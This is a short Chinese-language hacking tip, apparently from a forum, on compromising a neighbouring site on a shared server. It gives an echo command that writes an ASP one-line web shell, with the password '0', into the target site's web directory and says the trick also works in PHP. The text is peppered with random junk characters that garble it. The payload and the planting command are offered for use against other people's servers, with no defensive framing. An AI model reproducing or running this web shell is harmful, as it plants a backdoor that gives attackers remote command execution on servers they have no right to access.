在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。# |+ b% U! M! }- ]1 d' D7 H" L
e' z" s3 X3 ~. I/ d2 X( t命令格式9 k. }+ k9 n7 \) n6 Q+ j) r" ?5 V0 C
$ b# l3 [; v8 O& m+ G, Q% d# j
Echo 语句 >目标站绝对目录
6 d Y) I4 S7 U. Y5 o* P1 v7 O; d/ r* N! d) z J
例如: % D" w5 W) v2 p
u( D! Z; {1 J
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp% ]1 q! P/ U7 M1 i
: r8 D: a/ y5 v/ A) w这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
: a" j* G8 d4 U* @; j" @8 R$ _: [ |